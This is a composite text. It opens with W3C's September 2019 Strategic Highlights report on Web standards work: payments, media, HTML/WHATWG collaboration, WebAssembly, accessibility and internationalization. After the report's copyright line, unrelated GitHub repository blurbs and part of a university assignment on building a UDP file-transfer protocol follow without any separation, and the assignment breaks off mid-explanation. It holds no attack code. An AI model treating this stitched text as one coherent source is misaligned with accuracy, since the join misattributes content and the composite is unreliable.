W3C Strategic Highlights September 2019

This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available.

Introduction

This report highlights recent work to enhance the existing landscape of the Web platform and to innovate for the growth and strength of the Web.

33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous work-spaces in GitHub, which enables better monitoring and management.

We are in the middle of a period where we are chartering numerous working groups which demonstrate the rapid degree of change for the Web platform:

- After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation and we need to soon charter follow-on work. In the last year we chartered the Web Payment Security Interest Group.
- In the last year we chartered the Web Media Working Group with 7 specifications for next generation Media support on the Web.
- We have Accessibility Guidelines under W3C Member review which includes Silver, a new approach.
- We have just launched the Decentralized Identifier Working Group which has tremendous potential because Decentralized Identifier (DID) is an identifier that is globally unique, resolvable with high availability, and cryptographically verifiable.
- We have Privacy IG (PING) under W3C Member review which strengthens our focus on the tradeoff between privacy and function.
- We have a new CSS charter under W3C Member review which maps the group's work for the next three years.

In this period, W3C and the WHATWG have successfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts.

As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments.

We see the maturation and further development of an incredible number of new technologies coming to the Web. Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates.

Future Web Standards

W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops.
There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation.

Future, recent and under consideration Workshops include:

- Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities;
- W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA)
- W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report
- Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany)
- W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report
- Web & Machine Learning.

The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually to the chartering of a new standards group. The Funnel view is a GitHub Project where new areas are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel.

Public input is welcome at any stage but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, to review the ecosystem around the work and indicate interest in participating in its standardization, and then to draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process.
Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more:

Newly Chartered or Rechartered:

- Web Application Security WG (03-Apr)
- Web Payment Security IG (17-Apr)
- Patent and Standards IG (24-Apr)
- Web Applications WG (14-May)
- Web & Networks IG (16-May)
- Media WG (23-May)
- Media and Entertainment IG (06-Jun)
- HTML WG (06-Jun)
- Decentralized Identifier WG (05-Sep)
- Extended Privacy IG (PING) (30-Sep)
- Verifiable Claims WG (30-Sep)
- Service Workers WG (31-Dec)
- Dataset Exchange WG (31-Dec)
- Web of Things Working Group (31-Dec)
- Web Audio Working Group (31-Dec)

Proposed charters / Advance Notice:

- Accessibility Guidelines WG
- Privacy IG (PING)
- RDF Literal Direction WG
- Timed Text WG
- CSS WG
- Web Authentication WG

Closed:

- Internationalization Tag Set IG

Meeting Industry Needs

Web Payments

W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions.

The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in the Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation. Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover.
Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives.

Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising.

Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group.

In April, W3C launched the Web Payment Security Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as:

- How do SRC, FIDO, and Payment Request relate?
- The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline?
- How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity?

Digital Publishing

The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topics of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross referencing.
And the diverse publishing community represented in the groups consists of the traditional "trade" publishers, ebook reading system manufacturers, but also publishers of audio books, scholarly journals or educational materials, library scientists or browser developers.

The Publishing Working Group currently concentrates on Audiobooks which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard:

- Publication Manifest
- Audiobook profile for Web Publications
- Lightweight Packaging Format

The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival, are companions to the working group where specific work is developed and incubated.

The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to:

- publications on the Web
- reading modes and systems
- and the user experience of publications

The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2.

The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular the BG provided critical support to the update of EPUBCheck to validate EPUB content to the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB3 Community Group, of a new generation of EPUBCheck, i.e., EPUBCheck 4.2 production-ready release.
Media and Entertainment

The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, enabling missing features to stream video content on the Web such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received a Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web.

Current goals are to:

- Reinforce core media technologies: Creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-picture, Media Session) and maintain/evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG.
- Reduce fragmentation: Continue annual releases of a common and testable baseline media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Road-map of Media Technologies for the Web which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases.
- Create the future: Discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG. Transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019. View the report.
Timed Text

The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes:

- A robust WebVTT implementation report poises the specification for publication as a proposed recommendation.
- Discussions around re-chartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and clarify that rendering of captions within XR content is also in scope.

Immersive Web

Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications is now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges. The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment.

The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web.

W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive.

Web & Telecommunications

The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and propose new and innovative services.
Real-Time Communications (WebRTC)

WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the cornerstone of many online communication and collaboration services.

The WebRTC Working Group aims to bring WebRTC 1.0 (and companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering pushing features that have not gotten enough traction to separate modules or to a later minor revision of the spec.

Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV which the group has started documenting by identifying use cases.

Web & Networks

Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and network. The group's first efforts are around use cases, privacy & security requirements and liaisons.

Automotive

To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.). The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry.
It provides the access method to a common data model for all the vehicle signals –presently encapsulating a thousand or so different data elements– and will be growing to accommodate the advances in automotive such as autonomous and driver assist technologies and electrification.

The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and the same paradigm for other automotive needs including location-based services, media, notifications and caching content.

The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS in performing data sampling and off-boarding the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and handling of data are in scope.

The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need for additional ontologies around the transportation space.

Web of Things

W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing descriptions expressed in JSON-LD cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings.
The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more.

The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group:

- Web of Things Architecture
- Thing Descriptions

Strengthening the Core of the Web

HTML

The HTML Working Group was chartered early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications.

- Issues and proposed solutions for HTML and DOM done via the newly rechartered HTML Working Group in the WHATWG repositories
- The HTML Working Group is targeting November 2019 to bring HTML and DOM to Candidate Recommendations.

CSS

CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling, the latter needs intelligent (and fast!) scrolling and animations.

What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by CSS specifications.
Fonts

The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of WOFF Recommendations. Recent and ongoing work includes:

- Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with minimal glyph repertoire and the client can query the full repertoire and request additional subsets on-the-fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch update. Metrics to quantify improvement are a current hot discussion topic.
- The group will meet at ATypI 2019 in Japan, to gather requirements from the international typography community.
- The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020.

SVG

SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis.

The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format.

Audio

The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources — with different types of channel layout — are supported.
This modular design provides the flexibility to create complex audio functions with dynamic effects.

The first version of Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group.

Performance

Web Performance

There are currently 18 specifications in development in the Web Performance Working Group aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group which is poised to transition to a W3C Working Group. A preliminary draft charter is available.

WebAssembly

WebAssembly improves Web performance and power by being a virtual machine and execution environment enabling loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation.

WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to JavaScript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages and the byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occur through accompanying JavaScript libraries; the security model is identical to that of JavaScript.

Requirements gathering and language development occur in the Community Group while the Working Group manages test development, community review and progression of specifications on the Recommendation Track.
Testing

Browser testing plays a critical role in the growth of the Web by:

- Improving the reliability of Web technology definitions;
- Improving the quality of implementations of these technologies by helping vendors to detect bugs in their products;
- Improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing results of these tests.

Browser Testing and Tools

The Browser Testing and Tools Working Group is developing WebDriver version 2, having published last year the W3C Recommendation of WebDriver. WebDriver acts as a remote control interface that enables introspection and control of user agents, provides a platform- and language-neutral wire protocol as a way for out-of-process programs to remotely instruct the behavior of Web, and emulates the actions of a real person using the browser.

WebPlatform Tests

The WebPlatform Tests project now provides a mechanism that makes it possible to fully automate tests that previously needed to be run manually: TestDriver. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload.

In 2014, W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which WHATWG and all major browsers adopted.

Web of Data

There have been several great success stories around the standardization of data on the web over the past year.

Verifiable Claims seems to have significant uptake. It is also significant that the Distributed Identifier WG charter has received numerous favorable reviews, and was just recently launched.

JSON-LD has been a major success with the large deployment on Web sites via schema.org.
- JSON-LD 1.1 completed technical work, about to transition to CR
- More than 25% of websites today include schema.org data in JSON-LD
- The Web of Things description is in CR since May, making use of JSON-LD
- Verifiable Credentials data model is in CR since July, also making use of JSON-LD
- Continued strong interest in decentralized identifiers
- Engagement from the TAG with reframing core documents, such as Ethical Web Principles, to include data on the web within their scope

Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data that were developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs.

Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information and to include links to other data. There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services.

The digital transformation of industry is seeking to exploit advanced digital technologies. This will facilitate businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses.

Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We're now in the midst of a major shift to graph data with nodes and labeled directed links between them.
Graph data is:

- Faster than using SQL and associated JOIN operations
- More favorable to integrating data from heterogeneous sources
- Better suited to situations where the data model is evolving

In the wake of the recent W3C Workshop on Graph Data we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, to coordinate technical standards work and liaisons with external organizations.

Web for All

Security, Privacy, Identity

Authentication on the Web

As the WebAuthn Level 1 W3C Recommendation published last March is seeing wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open standard Web API gives native authentication technology built into native platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft, phishing attacks, thus aiming to end the era of passwords as a security construct. You may read more in our March press release.

Privacy

An increasing number of W3C specifications are benefitting from Privacy and Security review; there are security and privacy aspects to every specification. Early review is essential.

Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging further to the exploration of anti-patterns in standards and permission prompts.

Security

The Web Application Security Working Group adopted Feature Policy, aiming to allow developers to selectively enable, disable, or modify the behavior of some of these browser features and APIs within their application; and Fetch Metadata, aiming to provide servers with enough information to make a priori decisions about whether or not to service a request based on the way it was made, and the context in which it will be used.
The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments).

Internationalization (i18n)

Only a quarter or so of current Web users use English online and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name, and for the Web to truly work for stakeholders all around the world engaging with content in various languages, it must support the needs of worldwide users as they engage with content in the various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web. It is important to ensure the needs of local communities are captured.

The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education & outreach.

For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently:

- Requirements: New African and European language groups will work on the gap analysis, errata and layout requirements.
  - Gap analysis: Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic updated in the gap-analysis documents.
  - Layout requirements document: notable progress tracked in the Southeast Asian Task Force while work continues on Chinese layout requirements.
- Developer support:
  - Spec reviews: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups.
  - Short review checklist: easy way to begin a self-review to help spec developers understand what aspects of their spec are likely to need attention for internationalization, and points them to more detailed checklists for the relevant topics. It also helps those reviewing specs for i18n issues.
  - Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and direction with strings in JSON or other data formats. The document was rewritten for clarity, and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for base direction of text (bidi).
  - User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how the test works. This is particularly useful because those tests are pointed to by educational materials and gap-analysis documents.
  - Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including: css-counter-styles, css-ruby, css-syntax, css-test, css-text-decor, css-writing-modes, and css-pseudo.
- Education & outreach: (for all educational materials, see the HTML & CSS Authoring Techniques)

Web Accessibility

The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include:

- Education and training:
  - Inaccessibility of CAPTCHA updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog)
  - Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed revision and updating of the Business Case for Digital Accessibility.
Accessibility guidelines:
The Accessibility Guidelines Working Group has continued to update WCAG Techniques and Understanding WCAG 2.1; and published a Candidate Recommendation of Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating conformance of web content to WCAG.
An updated charter is being developed to host work on "Silver", the next generation accessibility guidelines (WCAG 2.2).

There are accessibility aspects to most specifications. Check your work with the FAST checklist.

Outreach to the world

W3C Developer Relations

To foster the excellent feedback loop between Web Standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include:

@w3cdevs tracks the enormous amount of work happening across W3C.
W3C Track during the Web Conference 2019 in San Francisco.
Tech videos: W3C published the 2019 Web Games Workshop videos.
The 16 September 2019 Developer Meetup in Fukuoka, Japan, is open to all and will combine a set of technical demos prepared by W3C groups, and a series of talks on a selected set of W3C technologies and projects.
W3C is involved with Mozilla, Google, Samsung, Microsoft and Bocoup in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog).

W3C Training

In partnership with EdX, W3C's MOOC training program, W3Cx offers a complete "Front-End Web Developer" (FEWD) professional certificate program that consists of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world.

Translations

Many Web users rely on translations of documents developed at W3C whose official language is English.
W3C is extremely grateful for the continuous efforts of its community in ensuring our various deliverables in general, and our specifications in particular, are made available in other languages, for free, ensuring their exposure to a much more diverse set of readers. Last Spring we developed a more robust system, a new listing of translations of W3C specifications and updated the instructions on how to contribute to our translation efforts.

W3C Liaisons

Liaisons and coordination with numerous organizations and Standards Development Organizations (SDOs) is crucial for W3C to:

make sure standards are interoperable
coordinate our respective agenda in Internet governance: W3C participates in ICANN, GIPO, IGF, the I* organizations (ICANN, IETF, ISOC, IAB).
ensure at the government liaison level that our standards work is officially recognized when important to our membership so that products based on them (often done by our members) are part of procurement orders. W3C has ARO/PAS status with ISO. W3C participates in the EU MSP and Rolling Plan on Standardization
ensure the global set of Web and Internet standards form a compatible stack of technologies, at the technical and policy level (patent regime, fragmentation, use in policy making)
promote Standards adoption equally by the industry, the public sector, and the public at large

Coralie Mercier, Editor, W3C Marketing & Communications
$Id: Overview.html,v 1.60 2019/10/15 12:05:52 coralie Exp $
Copyright © 2019 W3C ® (MIT, ERCIM, Keio, Beihang) Usage policies apply.
grrrr / Krippendorff Alpha
Python implementation of Krippendorff's alpha -- inter-rater reliability
John-Wang-0809 / LLM Writing Assessment Psychometric Framework
A repository for evaluating large language models as raters in large-scale writing assessments, focusing on a psychometric framework for reliability and validity.
SOYJUN / FTP Implement Based On UDP
The aim of this assignment is to have you do UDP socket client / server programming with a focus on two broad aspects:

Setting up the exchange between the client and server in a secure way despite the lack of a formal connection (as in TCP) between the two, so that ‘outsider’ UDP datagrams (broadcast, multicast, unicast - fortuitously or maliciously) cannot intrude on the communication.
Introducing application-layer protocol data-transmission reliability, flow control and congestion control in the client and server using TCP-like ARQ sliding window mechanisms.

The second item above is much more of a challenge to implement than the first, though neither is particularly trivial. But they are not tightly interdependent; each can be worked on separately at first and then integrated together at a later stage. Apart from the material in Chapters 8, 14 & 22 (especially Sections 22.5 - 22.7), and the experience you gained from the preceding assignment, you will also need to refer to the following:

ioctl function (Chapter 17).
get_ifi_info function (Section 17.6, Chapter 17). This function will be used by the server code to discover its node’s network interfaces so that it can bind all its interface IP addresses (see Section 22.6).
‘Race’ conditions (Section 20.5, Chapter 20).

You also need a thorough understanding of how the TCP protocol implements reliable data transfer, flow control and congestion control. Chapters 17-24 of TCP/IP Illustrated, Volume 1 by W. Richard Stevens give a good overview of TCP. Though somewhat dated for some things (it was published in 1994), it remains, overall, a good basic reference.

Overview

This assignment asks you to implement a primitive file transfer protocol for Unix platforms, based on UDP, and with TCP-like reliability added to the transfer operation using timeouts and sliding-window mechanisms, and implementing flow and congestion control.
The server is a concurrent server which can handle multiple clients simultaneously. A client gives the server the name of a file. The server forks off a child which reads directly from the file and transfers the contents over to the client using UDP datagrams. The client prints out the file contents as they come in, in order, with nothing missing and with no duplication of content, directly on to stdout (via the receiver sliding window, of course, but with no other intermediate buffering). The file to be transferred can be of arbitrary length, but its contents are always straightforward ascii text. As an aside let me mention that assuming the file contents are ascii is not as restrictive as it sounds. We can always pretend, for example, that binary files are base64 encoded (“ASCII armor”). A real file transfer protocol would, of course, have to worry about transferring files between heterogeneous platforms with different file structure conventions and semantics. The sender would first have to transform the file into a platform-independent, protocol-defined, format (using, say, ASN.1, or some such standard), and the receiver would have to transform the received file into its platform’s native file format. This kind of thing can be fairly time consuming, and is certainly very tedious, to implement, with little educational value - it is not part of this assignment.

Arguments for the server

You should provide the server with an input file server.in from which it reads the following information, in the order shown, one item per line:

Well-known port number for server.
Maximum sending sliding-window size (in datagram units).

You will not be handing in your server.in file. We shall create our own when we come to test your code. So it is important that you stick strictly to the file name and content conventions specified above. The same applies to the client.in input file below.
Arguments for the client

The client is to be provided with an input file client.in from which it reads the following information, in the order shown, one item per line:

IP address of server (not the hostname).
Well-known port number of server.
Filename to be transferred.
Receiving sliding-window size (in datagram units).
Random generator seed value.
Probability p of datagram loss. This should be a real number in the range [ 0.0 , 1.0 ] (value 0.0 means no loss occurs; value 1.0 means all datagrams are lost).
The mean µ, in milliseconds, for an exponential distribution controlling the rate at which the client reads received datagram payloads from its receive buffer.

Operation

Server starts up and reads its arguments from file server.in. As we shall see, when a client communicates with the server, the server will want to know what IP address that client is using to identify the server (i.e., the destination IP address in the incoming datagram). Normally, this can be done relatively straightforwardly using the IP_RECVDESTADDR socket option, and picking up the information using the ancillary data (‘control information’) capability of the recvmsg function. Unfortunately, Solaris 2.10 does not support the IP_RECVDESTADDR option (nor, incidentally, does it support the msg_flags option in msghdr - see p.390). This considerably complicates things. In the absence of IP_RECVDESTADDR, what the server has to do as part of its initialization phase is to bind each IP address it has (and, simultaneously, its well-known port number, which it has read in from server.in) to a separate UDP socket. The code in Section 22.6, which uses the get_ifi_info function, shows you how to do that. However, there are important differences between that code and the version you want to implement. The code of Section 22.6 binds the IP addresses and forks off a child for each address that is bound to. We do not want to do that. Instead you should have an array of socket descriptors.
For each IP address, create a new socket and bind the address (and well-known port number) to the socket without forking off child processes. Creating child processes comes later, when clients arrive. The code of Section 22.6 also attempts to bind broadcast addresses. We do not want to do this. It binds a wildcard IP address, which we certainly do not want to do either. We should bind strictly only unicast addresses (including the loopback address). The get_ifi_info function (which the code in Section 22.6 uses) has to be modified so that it also gets the network masks for the IP addresses of the node, and adds these to the information stored in the linked list of ifi_info structures (see Figure 17.5, p.471) it produces. As you go binding each IP address to a distinct socket, it will be useful for later processing to build your own array of structures, where a structure element records the following information for each socket : sockfd IP address bound to the socket network mask for the IP address subnet address (obtained by doing a bit-wise and between the IP address and its network mask) Report, in a ReadMe file which you hand in with your code, on the modifications you had to introduce to ensure that only unicast addresses are bound, and on your implementation of the array of structures described above. You should print out on stdout, with an appropriate message and appropriately formatted in dotted decimal notation, the IP address, network mask, and subnet address for each socket in your array of structures (you do not need to print the sockfd). The server now uses select to monitor the sockets it has created for incoming datagrams. When it returns from select, it must use recvfrom or recvmsg to read the incoming datagram (see 6. below). When a client starts, it first reads its arguments from the file client.in. The client checks if the server host is ‘local’ to its (extended) Ethernet. 
If so, all its communication to the server is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option). It determines if the server host is ‘local’ as follows. The first thing the client should do is to use the modified get_ifi_info function to obtain all of its IP addresses and associated network masks. Print out on stdout, in dotted decimal notation and with an appropriate message, the IP addresses and network masks obtained. In the following, IPserver designates the IP address the client will use to identify the server, and IPclient designates the IP address the client will choose to identify itself. The client checks whether the server is on the same host. If so, it should use the loopback address 127.0.0.1 for the server (i.e. , IPserver = 127.0.0.1). IPclient should also be set to the loopback address. Otherwise it proceeds as follows: IPserver is set to the IP address for the server in the client.in file. Given IPserver and the (unicast) IP addresses and network masks for the client returned by get_ifi_info in the linked list of ifi_info structures, you should be able to figure out if the server node is ‘local’ or not. This will be discussed in class; but let me just remind you here that you should use ‘longest prefix matching’ where applicable. If there are multiple client addresses, and the server host is ‘local’, the client chooses an IP address for itself, IPclient, which matches up as ‘local’ according to your examination above. If the server host is not ‘local’, then IPclient can be chosen arbitrarily. Print out on stdout the results of your examination, as to whether the server host is ‘local’ or not, as well as the IPclient and IPserver addresses selected. Note that this manner of determining whether the server is local or not is somewhat clumsy and ‘over-engineered’, and, as such, should be viewed more in the nature of a pedagogical exercise. Ideally, we would like to look up the server IP address(es) in the routing table (see Section 18.3). 
